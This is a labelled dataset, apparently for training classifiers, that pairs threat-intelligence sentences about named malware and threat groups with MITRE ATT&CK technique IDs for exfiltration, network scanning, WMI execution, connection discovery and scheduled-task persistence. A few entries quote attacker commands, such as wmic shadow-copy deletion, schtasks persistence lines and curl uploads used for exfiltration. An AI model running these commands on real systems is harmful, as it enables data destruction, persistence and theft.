{"text1":"Metamorfo can send the data it collects to the C2 server.","labels":"['T1041']"}
{"text1":"Misdat has uploaded files and data to its C2 servers.","labels":"['T1041']"}
{"text1":"Mongall can upload files and information from a compromised host to its C2 server.","labels":"['T1041']"}
{"text1":"MuddyWater has used C2 infrastructure to receive exfiltrated data.","labels":"['T1041']"}
{"text1":"Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.","labels":"['T1041']"}
{"text1":"OopsIE can upload files from the victim's machine to its C2 server.","labels":"['T1041']"}
{"text1":"Operation Wocao has used the Xserver backdoor to exfiltrate data.","labels":"['T1041']"}
{"text1":"OutSteel can upload files from a compromised host over its C2 channel.","labels":"['T1041']"}
{"text1":"PcShare can upload files and information from a compromised host to its C2 servers.","labels":"['T1041']"}
{"text1":"PoetRAT has exfiltrated data over the C2 channel.","labels":"['T1041']"}
{"text1":"Proxysvc performs data exfiltration over the control server channel using a custom protocol.","labels":"['T1041']"}
{"text1":"Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.","labels":"['T1041']"}
{"text1":"Pteranodon exfiltrates screenshot files to its C2 server.","labels":"['T1041']"}
{"text1":"Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.","labels":"['T1041']"}
{"text1":"QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.","labels":"['T1041']"}
{"text1":"Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.","labels":"['T1041']"}
{"text1":"S-Type has uploaded data and files from a compromised host to its C2 servers.","labels":"['T1041']"}
{"text1":"SDBbot has sent collected data from a compromised host to its C2 servers.","labels":"['T1041']"}
{"text1":"SILENTTRINITY can transfer files from an infected host to the C2 server.","labels":"['T1041']"}
{"text1":"SMOKEDHAM has exfiltrated data to its C2 server.","labels":"['T1041']"}
{"text1":"STARWHALE can exfiltrate collected data to its C2 servers.","labels":"['T1041']"}
{"text1":"Sandworm Team has sent system information to its C2 server using HTTP.","labels":"['T1041']"}
{"text1":"Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.","labels":"['T1041']"}
{"text1":"ShimRatReporter sent generated reports to the C2 via HTTP POST requests.","labels":"['T1041']"}
{"text1":"SideTwist has exfiltrated data over its C2 channel.","labels":"['T1041']"}
{"text1":"Sliver can exfiltrate files from the victim using the \"download\" command.","labels":"['T1041']"}
{"text1":"SombRAT has uploaded collected data and files from a compromised host to its C2 server.","labels":"['T1041']"}
{"text1":"StrifeWater can send data and files from a compromised host to its C2 server.","labels":"['T1041']"}
{"text1":"StrongPity can exfiltrate collected documents through C2 channels.","labels":"['T1041']"}
{"text1":"Stuxnet sends compromised victim information via HTTP.","labels":"['T1041']"}
{"text1":"TajMahal has the ability to send collected files over its C2.","labels":"['T1041']"}
{"text1":"Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.","labels":"['T1041']"}
{"text1":"Torisma can send victim data to an actor-controlled C2 server.","labels":"['T1041']"}
{"text1":"TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.","labels":"['T1041']"}
{"text1":"Ursnif has used HTTP POSTs to exfil gathered information.","labels":"['T1041']"}
{"text1":"Valak has the ability to exfiltrate data over the C2 channel.","labels":"['T1041']"}
{"text1":"XCSSET exfiltrates data stolen from a system over its C2 channel.","labels":"['T1041']"}
{"text1":"ZLib has sent data and files from a compromised host to its C2 servers.","labels":"['T1041']"}
{"text1":"njRAT has used HTTP to receive stolen information from the infected machine.","labels":"['T1041']"}
{"text1":"APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.","labels":"['T1046']"}
{"text1":"APT34 has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.","labels":"['T1046']"}
{"text1":"APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning.","labels":"['T1046']"}
{"text1":"Backdoor.Oldrea can use a network scanning module to identify ICS-related ports.","labels":"['T1046']"}
{"text1":"BlackEnergy has conducted port scans on a host.","labels":"['T1046']"}
{"text1":"BlackTech has used the SNScan tool to find other potential targets on victim networks.","labels":"['T1046']"}
{"text1":"China Chopper's server component can spider authentication portals.","labels":"['T1046']"}
{"text1":"Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.","labels":"['T1046']"}
{"text1":"Conficker scans for other machines to infect.","labels":"['T1046']"}
{"text1":"CostaRicto employed nmap and pscan to scan target environments.","labels":"['T1046']"}
{"text1":"During CostaRicto, the threat actors employed nmap and pscan to scan target environments.","labels":"['T1046']"}
{"text1":"During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.","labels":"['T1046']"}
{"text1":"HDoor scans to identify open ports on the victim.","labels":"['T1046']"}
{"text1":"HermeticWizard has the ability to scan ports on a compromised network.","labels":"['T1046']"}
{"text1":"Industroyer uses a custom port scanner to map out a network.","labels":"['T1046']"}
{"text1":"InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols.","labels":"['T1046']"}
{"text1":"Koadic can scan for open TCP ports on the target network.","labels":"['T1046']"}
{"text1":"Lucifer can scan for open ports including TCP ports 135 and 1433.","labels":"['T1046']"}
{"text1":"NBTscan can be used to scan IP networks.","labels":"['T1046']"}
{"text1":"OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.","labels":"['T1046']"}
{"text1":"Operation Wocao has scanned for open ports and used nbtscan to find NETBIOS nameservers.","labels":"['T1046']"}
{"text1":"Peirates can initiate a port scan against a given IP address.","labels":"['T1046']"}
{"text1":"PoshC2 can perform port scans from an infected host.","labels":"['T1046']"}
{"text1":"Pupy has a built-in module for port scanning.","labels":"['T1046']"}
{"text1":"Pysa can perform network reconnaissance using the Advanced Port Scanner tool.","labels":"['T1046']"}
{"text1":"Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.","labels":"['T1046']"}
{"text1":"SILENTTRINITY can scan for open ports on a compromised machine.","labels":"['T1046']"}
{"text1":"SpeakUp checks for availability of specific ports on servers.","labels":"['T1046']"}
{"text1":"Suckfly the victim's internal network for hosts with ports 8080, 5900, and 40 open.","labels":"['T1046']"}
{"text1":"TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.","labels":"['T1046']"}
{"text1":"ZxShell can launch port scans.","labels":"['T1046']"}
{"text1":"menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.","labels":"['T1046']"}
{"text1":"A BlackEnergy 2 plug-in uses WMI to gather victim host details.","labels":"['T1047']"}
{"text1":"A Threat Group-3390 tool can use WMI to execute a binary.","labels":"['T1047']"}
{"text1":"APT29 used WMI to steal credentials and execute backdoors at a future time. They have also used WMI for the remote execution of files for lateral movement.","labels":"['T1047']"}
{"text1":"APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process.","labels":"['T1047']"}
{"text1":"APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.","labels":"['T1047']"}
{"text1":"Agent Tesla has used wmi queries to gather information from the system.","labels":"['T1047']"}
{"text1":"Astaroth uses WMIC to execute payloads.","labels":"['T1047']"}
{"text1":"Blue Mockingbird has used wmic.exe to set environment variables.","labels":"['T1047']"}
{"text1":"Bumblebee can use WMI to gather system information and to spawn processes for code injection.","labels":"['T1047']"}
{"text1":"CharmPower can use `wmic` to gather information from a system.","labels":"['T1047']"}
{"text1":"Chimera has used WMIC to execute remote commands.","labels":"['T1047']"}
{"text1":"CrackMapExec can execute remote commands using Windows Management Instrumentation.","labels":"['T1047']"}
{"text1":"DarkWatchman can use WMI to execute commands.","labels":"['T1047']"}
{"text1":"During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.","labels":"['T1047']"}
{"text1":"During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.","labels":"['T1047']"}
{"text1":"EKANS can use Windows Mangement Instrumentation (WMI) calls to execute operations.","labels":"['T1047']"}
{"text1":"EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.","labels":"['T1047']"}
{"text1":"Earth Lusca used a VBA script to execute WMI.","labels":"['T1047']"}
{"text1":"Emotet has used WMI to execute powershell.exe.","labels":"['T1047']"}
{"text1":"Empire can use WMI to deliver a payload to a remote host.","labels":"['T1047']"}
{"text1":"EvilBunny has used WMI to gather information about the system.","labels":"['T1047']"}
{"text1":"FELIXROOT uses WMI to query the Windows Registry.","labels":"['T1047']"}
{"text1":"FIN6 has used WMI to automate the remote execution of PowerShell scripts.","labels":"['T1047']"}
{"text1":"FIN7 has used WMI to install malware on targeted systems.","labels":"['T1047']"}
{"text1":"FIN8's malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. FIN8 has also used WMIC for lateral movement as well as during and post compromise cleanup activities.","labels":"['T1047']"}
{"text1":"FlawedAmmyy leverages WMI to enumerate anti-virus on the victim.","labels":"['T1047']"}
{"text1":"Frankenstein has used WMI queries to check if various security applications were running, as well as the operating system version.","labels":"['T1047']"}
{"text1":"FunnyDream can use WMI to open a Windows command shell on a remote machine.","labels":"['T1047']"}
{"text1":"GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.","labels":"['T1047']"}
{"text1":"Gamaredon Group has used WMI to execute scripts used for discovery.","labels":"['T1047']"}
{"text1":"GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).","labels":"['T1047']"}
{"text1":"HALFBAKED can use WMI queries to gather system information.","labels":"['T1047']"}
{"text1":"HELLOKITTY can use WMI to delete volume shadow copies.","labels":"['T1047']"}
{"text1":"HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.","labels":"['T1047']"}
{"text1":"HermeticWizard can use WMI to create a new process on a remote machine via `C:\\windows\\system32\\cmd.exe \/c start C:\\windows\\system32\\\\regsvr32.exe \/s \/iC:\\windows\\<filename>.dll`.","labels":"['T1047']"}
{"text1":"IcedID has used WMI to execute binaries.","labels":"['T1047']"}
{"text1":"Impacket's wmiexec module can be used to execute commands through WMI.","labels":"['T1047']"}
{"text1":"Koadic can use WMI to execute commands.","labels":"['T1047']"}
{"text1":"Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.","labels":"['T1047']"}
{"text1":"Lucifer can use WMI to log into remote machines for propagation.","labels":"['T1047']"}
{"text1":"Magic Hound has used a tool to run `cmd \/c wmic computersystem get domain` for discovery.","labels":"['T1047']"}
{"text1":"Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.","labels":"['T1047']"}
{"text1":"Meteor can use `wmic.exe` as part of its effort to delete shadow copies.","labels":"['T1047']"}
{"text1":"Micropsia searches for anti-virus software and firewall products installed on the victim\u2019s machine using WMI.","labels":"['T1047', 'T1518.001']"}
{"text1":"Mosquito's installer uses WMI to search for antivirus display names.","labels":"['T1047']"}
{"text1":"MuddyWater has used malware that leveraged WMI for execution and querying host information.","labels":"['T1047']"}
{"text1":"Naikon has used WMIC.exe for lateral movement.","labels":"['T1047']"}
{"text1":"Netwalker can use WMI to delete Shadow Volumes.","labels":"['T1047']"}
{"text1":"NotPetya can use \"wmic\" to help propagate itself across a network.","labels":"['T1047']"}
{"text1":"Octopus has used wmic.exe for local discovery information.","labels":"['T1047']"}
{"text1":"OilRig has used WMI for execution.","labels":"['T1047']"}
{"text1":"OopsIE uses WMI to perform discovery techniques.","labels":"['T1047']"}
{"text1":"POWERSTATS can use WMI queries to retrieve data from compromised hosts.","labels":"['T1047']"}
{"text1":"POWRUNER may use WMI when collecting information about a victim.","labels":"['T1047']"}
{"text1":"ProLock can use WMIC to execute scripts on targeted hosts.","labels":"['T1047']"}
{"text1":"PyDCrypt has attempted to execute with WMIC.","labels":"['T1047']"}
{"text1":"RATANKBA uses WMI to perform process monitoring.","labels":"['T1047']"}
{"text1":"REvil can use WMI to monitor for and kill specific processes listed in its configuration file.","labels":"['T1047']"}
{"text1":"Remexi executes received commands with wmic.exe (for WMI commands).","labels":"['T1047']"}
{"text1":"RogueRobin uses various WMI queries to check if the sample is running in a sandbox.","labels":"['T1047']"}
{"text1":"SILENTTRINITY can use WMI for lateral movement.","labels":"['T1047']"}
{"text1":"SUNBURST used the WMI query \"Select * From Win32_SystemDriver\" to retrieve a driver listing.","labels":"['T1047']"}
{"text1":"Sandworm Team has used VBScript to run WMI queries.","labels":"['T1047']"}
{"text1":"SharpStage can use WMI for execution.","labels":"['T1047']"}
{"text1":"Stuxnet used WMI with an \"explorer.exe\" token to execute on a remote share.","labels":"['T1047']"}
{"text1":"SysUpdate can use WMI for execution on a compromised host.","labels":"['T1047']"}
{"text1":"UNC2452 used WMI for the remote execution of files for lateral movement.","labels":"['T1047']"}
{"text1":"Ursnif droppers have used WMI classes to execute PowerShell commands.","labels":"['T1047']"}
{"text1":"Valak can use \"wmic process call create\" in a scheduled task to launch plugins and for execution.","labels":"['T1047']"}
{"text1":"WannaCry utilizes \"wmic\" to delete shadow copies.","labels":"['T1047']"}
{"text1":"Windshift has used WMI to collect information about target machines.","labels":"['T1047']"}
{"text1":"Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally.","labels":"['T1047']"}
{"text1":"jRAT uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.","labels":"['T1047']"}
{"text1":"Bundlore uses the \"curl -s -L -o\" command to exfiltrate archived data to a URL.","labels":"['T1048']"}
{"text1":"FrameworkPOS can use DNS tunneling for exfiltration of credit card data.","labels":"['T1048']"}
{"text1":"Hydraq connects to a predefined domain on port 443 to exfil gathered information.","labels":"['T1048']"}
{"text1":"Kobalos can exfiltrate credentials over the network via UDP.","labels":"['T1048']"}
{"text1":"PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account.","labels":"['T1048']"}
{"text1":"APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.","labels":"['T1048.002']"}
{"text1":"APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.","labels":"['T1048.002']"}
{"text1":"UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.","labels":"['T1048.002']"}
{"text1":"APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.","labels":"['T1048.003']"}
{"text1":"Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.","labels":"['T1048.003']"}
{"text1":"BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.","labels":"['T1048.003']"}
{"text1":"CORALDECK has exfiltrated data in HTTP POST headers.","labels":"['T1048.003']"}
{"text1":"Carbon uses HTTP to send data to the C2 server.","labels":"['T1048.003']"}
{"text1":"CharmPower can send victim data via FTP with credentials hardcoded in the script.","labels":"['T1048.003']"}
{"text1":"Cherry Picker exfiltrates files over FTP.","labels":"['T1048.003']"}
{"text1":"CookieMiner has used the \"curl --upload-file\" command to exfiltrate data over HTTP.","labels":"['T1048.003']"}
{"text1":"CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.","labels":"['T1048.003']"}
{"text1":"Dok exfiltrates logs of its execution stored in the \"\/tmp\" folder over FTP using the \"curl\" command.","labels":"['T1048.003']"}
{"text1":"FIN8 has used FTP to exfiltrate collected data.","labels":"['T1048.003']"}
{"text1":"Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.","labels":"['T1048.003']"}
{"text1":"Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.","labels":"['T1048.003']"}
{"text1":"PoetRAT has used ftp for exfiltration.","labels":"['T1048.003']"}
{"text1":"Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.","labels":"['T1048.003']"}
{"text1":"Some Brave Prince variants have used South  Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.","labels":"['T1048.003']"}
{"text1":"Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.","labels":"['T1048.003']"}
{"text1":"WindTail has the ability to automatically exfiltrate files using the macOS built-in utility \/usr\/bin\/curl.","labels":"['T1048.003']"}
{"text1":"Wizard Spider has exfiltrated victim information using FTP.","labels":"['T1048.003']"}
{"text1":"ccf32 can upload collected data and files to an FTP server.","labels":"['T1048.003']"}
{"text1":"ftp may be used to exfiltrate data separate from the main command and control protocol.","labels":"['T1048.003']"}
{"text1":"APT32 used the \"netstat -anpo tcp\" command to display TCP connections on the victim's machine.","labels":"['T1049']"}
{"text1":"APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.","labels":"['T1049']"}
{"text1":"Andariel has used the \"netstat -naop tcp\" command to display TCP connections on a victim's machine.","labels":"['T1049']"}
{"text1":"Aria-body has the ability to gather TCP and UDP table status listings.","labels":"['T1049']"}
{"text1":"Babuk can use \u201cWNetOpenEnumW\u201d and \u201cWNetEnumResourceW\u201d to enumerate files in network resources for encryption.","labels":"['T1049']"}
{"text1":"BackdoorDiplomacy has used NetCat and PortQry  to enumerate network connections and display the status of related TCP and UDP ports.","labels":"['T1049']"}
{"text1":"BlackEnergy has gathered information about local network connections using netstat.","labels":"['T1049']"}
{"text1":"Carbon uses the \"netstat -r\" and \"netstat -an\" commands.","labels":"['T1049']"}
{"text1":"Chimera has used \"netstat -ano | findstr EST\" to discover network connections.","labels":"['T1049']"}
{"text1":"Cobalt Strike can produce a sessions report from compromised hosts.","labels":"['T1049']"}
{"text1":"Commands such as \"net use\" and \"net session\" can be used in Net to gather information about network connections from a particular host.","labels":"['T1049']"}
{"text1":"Comnie executes the \"netstat -ano\" command.","labels":"['T1049']"}
{"text1":"Conti can enumerate routine network connections from a compromised host.","labels":"['T1049']"}
{"text1":"Cuba can use the function \"GetIpNetTable\" to recover the last connections to the victim's machine.","labels":"['T1049']"}
{"text1":"Dtrack can collect network and active connection information.","labels":"['T1049']"}
{"text1":"During FunnyDream, the threat actors used netstat to discover network connections on remote systems.","labels":"['T1049']"}
{"text1":"During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection.","labels":"['T1049']"}
{"text1":"Egregor can enumerate all connected drives.","labels":"['T1049']"}
{"text1":"Empire can enumerate the current network connections of a host.","labels":"['T1049']"}
{"text1":"Epic uses the \"net use\", \"net session\", and \"netstat\" commands to gather information on network connections.","labels":"['T1049']"}
{"text1":"GravityRAT uses the \"netstat\" command to find open ports on the victim\u2019s machine.","labels":"['T1049']"}
{"text1":"KONNI has used \"net session\" on the victim's machine.","labels":"['T1049']"}
{"text1":"Ke3chang performs local network connection discovery using \"netstat\".","labels":"['T1049']"}
{"text1":"Kwampirs collects a list of active and listening connections by using the command \"netstat -nao\" as well as a list of available network mappings with \"net use\".","labels":"['T1049']"}
{"text1":"Lazarus Group has used \"net use\" to identify and establish a network connection with a remote host.","labels":"['T1049']"}
{"text1":"Lucifer can identify the IP and port numbers for all remote connections from the compromised host.","labels":"['T1049']"}
{"text1":"Machete uses the \"netsh wlan show networks mode=bssid\" and \"netsh wlan show interfaces\" commands to list all nearby WiFi networks and connected interfaces.","labels":"['T1049']"}
{"text1":"Magic Hound has used quser.exe to identify existing RDP connections.","labels":"['T1049']"}
{"text1":"Maze has used the \"WNetOpenEnumW\", \"WNetEnumResourceW\u201d, \u201cWNetCloseEnum\u201d and \u201cWNetAddConnection2W\u201d functions to enumerate the network resources on the infected machine.","labels":"['T1049']"}
{"text1":"NETWIRE can capture session logon details from a compromised host.","labels":"['T1049']"}
{"text1":"OilRig has used \"netstat -an\" on a victim to get a listing of network connections.","labels":"['T1049']"}
{"text1":"Okrum was seen using NetSess to discover NetBIOS sessions.","labels":"['T1049']"}
{"text1":"PlugX has a module for enumerating TCP and UDP network connections and associated processes using the \"netstat\" command.","labels":"['T1049']"}
{"text1":"Poseidon Group obtains and saves information about victim network interfaces and addresses.","labels":"['T1049']"}
{"text1":"PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections.","labels":"['T1049']"}
{"text1":"Pupy has a built-in utility command for \"netstat\", can do net session through PowerView, and has an interactive shell which can be used to discover additional information.","labels":"['T1049']"}
{"text1":"PyDCrypt has used netsh to find RPC connections on remote machines.","labels":"['T1049']"}
{"text1":"QakBot can use \"netstat\" to enumerate current network connections.","labels":"['T1049']"}
{"text1":"RATANKBA uses \"netstat -ano\" to search for specific IP address ranges.","labels":"['T1049']"}
{"text1":"Ramsay can use \"netstat\" to enumerate network connections.","labels":"['T1049']"}
{"text1":"RedLeaves can enumerate drives and Remote Desktop sessions.","labels":"['T1049']"}
{"text1":"SHOTPUT uses netstat to list TCP connection status.","labels":"['T1049']"}
{"text1":"SLOTHFULMEDIA can enumerate open ports on a victim machine.","labels":"['T1049']"}
{"text1":"Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.","labels":"['T1049']"}
{"text1":"ShimRatReporter used the Windows function \"GetExtendedUdpTable\" to detect connected UDP endpoints.","labels":"['T1049']"}
{"text1":"Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine.","labels":"['T1049']"}
{"text1":"Sliver can collect network connection information.","labels":"['T1049']"}
{"text1":"Sykipot may use \"netstat -ano\" to display active network connections.","labels":"['T1049']"}
{"text1":"TeamTNT has run \"netstat -anp\" to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify \"\/etc\/ld.so.preload\".","labels":"['T1049']"}
{"text1":"The discovery modules used with Duqu can collect information on network connections.","labels":"['T1049']"}
{"text1":"Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.","labels":"['T1049']"}
{"text1":"Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.","labels":"['T1049']"}
{"text1":"USBferry can use \"netstat\" and \"nbtstat\" to detect active network connections.","labels":"['T1049']"}
{"text1":"Volgmer can gather information about TCP connection state.","labels":"['T1049']"}
{"text1":"Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.","labels":"['T1049']"}
{"text1":"Zebrocy uses \"netstat -aon\" to gather network connection information.","labels":"['T1049']"}
{"text1":"admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: \"netstat -ano >> %temp%\\download\"","labels":"['T1049']"}
{"text1":"menuPass has used \"net use\" to conduct connectivity checks to machines.","labels":"['T1049']"}
{"text1":"netstat can be used to enumerate local network connections, including active TCP connections and other network statistics.","labels":"['T1049']"}
{"text1":"Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.","labels":"['T1052.001']"}
{"text1":"Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.","labels":"['T1052.001']"}
{"text1":"Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.","labels":"['T1052.001']"}
{"text1":"SPACESHIP copies staged data to removable drives when they are inserted into the system.","labels":"['T1052.001']"}
{"text1":"USBStealer exfiltrates collected files via removable media from air-gapped victims.","labels":"['T1052.001']"}
{"text1":"Dragonfly has used a scheduled task to execute a malicious file.","labels":"['T1053']"}
{"text1":"Earth Lusca used the command \"schtasks \/Create \/SC ONLOgon \/TN WindowsUpdateCheck \/TR \u201c[file path]\u201d \/ru system\" for persistence.","labels":"['T1053']"}
{"text1":"BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement.","labels":"['T1053.002']"}
{"text1":"CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.","labels":"['T1053.002']"}
{"text1":"at can be used to schedule a task on a system to be executed at a specific date or time.","labels":"['T1053.002']"}
{"text1":"Anchor can install itself as a cron job.","labels":"['T1053.003']"}
{"text1":"Exaramel for Linux uses crontab for persistence if it does not have root privileges.","labels":"['T1053.003']"}
{"text1":"Janicab used a cron job for persistence on Mac devices.","labels":"['T1053.003']"}
{"text1":"Kinsing has used crontab to download and run shell scripts every minute to ensure persistence.","labels":"['T1053.003']"}
{"text1":"Penquin can use Cron to create periodic and pre-scheduled background jobs.","labels":"['T1053.003']"}
{"text1":"Rocke installed a cron job that downloaded and executed files from the C2.","labels":"['T1053.003']"}
{"text1":"Skidmap has installed itself via crontab.","labels":"['T1053.003']"}
{"text1":"SpeakUp uses cron tasks to ensure persistence.","labels":"['T1053.003']"}
{"text1":"The GoldMax Linux variant has used a crontab entry with a \"@reboot\" line to gain persistence.","labels":"['T1053.003']"}
{"text1":"A Patchwork file stealer can run a TaskScheduler DLL to add persistence.","labels":"['T1053.005']"}
{"text1":"APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google.","labels":"['T1053.005']"}
{"text1":"APT32 has used scheduled tasks to persist on victim systems.","labels":"['T1053.005']"}
{"text1":"APT33 has created a scheduled task to execute a .vbe file multiple times a day.","labels":"['T1053.005']"}
{"text1":"APT37 has created scheduled tasks to run malicious scripts on a compromised host.","labels":"['T1053.005']"}
{"text1":"APT39 has created scheduled tasks for persistence.","labels":"['T1053.005']"}
{"text1":"APT41 used a compromised account to create a scheduled task on a system.","labels":"['T1053.005']"}
{"text1":"Anchor can create a scheduled task for persistence.","labels":"['T1053.005']"}
{"text1":"AppleJeus has created a scheduled SYSTEM task that runs when a user logs in.","labels":"['T1053.005']"}
{"text1":"Attor's installer plugin can schedule a new task that loads the dispatcher on boot\/logon.","labels":"['T1053.005']"}
{"text1":"BADNEWS creates a scheduled task to establish by executing a malicious payload every subsequent minute.","labels":"['T1053.005']"}
{"text1":"BITTER has used scheduled tasks for persistence and execution.","labels":"['T1053.005']"}
{"text1":"BONDUPDATER persists using a scheduled task that executes every minute.","labels":"['T1053.005']"}
{"text1":"BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement.","labels":"['T1053.005']"}
{"text1":"BabyShark has used scheduled tasks to maintain persistence.","labels":"['T1053.005']"}
{"text1":"BackConfig has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.","labels":"['T1053.005']"}
{"text1":"Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts.","labels":"['T1053.005']"}
{"text1":"Carbon creates several tasks for later execution to continue persistence on the victim\u2019s machine.","labels":"['T1053.005']"}
{"text1":"Cobalt Group has created Windows tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"ComRAT has used a scheduled task to launch its PowerShell loader.","labels":"['T1053.005']"}
{"text1":"Confucius has created scheduled tasks to maintain persistence on a compromised host.","labels":"['T1053.005']"}
{"text1":"CostaRicto has used scheduled tasks to download backdoor tools.","labels":"['T1053.005']"}
{"text1":"Crutch has the ability to persist using scheduled tasks.","labels":"['T1053.005']"}
{"text1":"Dragonfly 2.0 used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.","labels":"['T1053.005']"}
{"text1":"Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.","labels":"['T1053.005']"}
{"text1":"During Frankenstein, the threat actors established persistence through a scheduled task using the command: `\/Create \/F \/SC DAILY \/ST 09:00 \/TN WinUpdate \/TR`, named \"WinUpdate\"","labels":"['T1053.005']"}
{"text1":"During Operation Wocao, threat actors used scheduled tasks to execute malicious PowerShell code on remote systems.","labels":"['T1053.005']"}
{"text1":"Empire has modules to interact with the Windows task scheduler.","labels":"['T1053.005']"}
{"text1":"EvilBunny has executed commands via scheduled tasks.","labels":"['T1053.005']"}
{"text1":"FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.","labels":"['T1053.005']"}
{"text1":"FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.","labels":"['T1053.005']"}
{"text1":"FIN7 malware has created scheduled tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"FIN8 has used scheduled tasks to maintain RDP backdoors.","labels":"['T1053.005']"}
{"text1":"Fox Kitten has used Scheduled Tasks for persistence and to load and execute a reverse proxy binary.","labels":"['T1053.005']"}
{"text1":"Frankenstein has established persistence through a scheduled task using the command: \" \/Create \/F \/SC DAILY \/ST 09:00 \/TN WinUpdate \/TR \", named \"WinUpdate\".","labels":"['T1053.005']"}
{"text1":"GALLIUM established persistence for PoisonIvy by created a scheduled task.","labels":"['T1053.005']"}
{"text1":"GRIFFON has used \"sctasks\" for persistence.","labels":"['T1053.005']"}
{"text1":"Gamaredon Group has created scheduled tasks to launch executables after a designated number of minutes have passed.","labels":"['T1053.005']"}
{"text1":"Gazer can establish persistence by creating a scheduled task.","labels":"['T1053.005']"}
{"text1":"GoldMax has used scheduled tasks to maintain persistence.","labels":"['T1053.005']"}
{"text1":"Goopy has the ability to maintain persistence by creating scheduled tasks set to run every hour.","labels":"['T1053.005']"}
{"text1":"GravityRAT creates a scheduled task to ensure it is re-executed everyday.","labels":"['T1053.005']"}
{"text1":"GrimAgent has the ability to set persistence using the Task Scheduler.","labels":"['T1053.005']"}
{"text1":"HEXANE has used a scheduled task to establish persistence for a keylogger.","labels":"['T1053.005']"}
{"text1":"Helminth has used a scheduled task for persistence.","labels":"['T1053.005']"}
{"text1":"HotCroissant has attempted to install a scheduled task named \u201cJava Maintenance64\u201d on startup to establish persistence.","labels":"['T1053.005']"}
{"text1":"ISMInjector creates scheduled tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"IronNetInjector has used a task XML file named \"mssch.xml\" to run an IronPython script when a user logs in or when specific system events are created.","labels":"['T1053.005']"}
{"text1":"JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in.","labels":"['T1053.005']"}
{"text1":"JSS Loader has the ability to launch scheduled tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"Koadic has used scheduled tasks to add persistence.","labels":"['T1053.005']"}
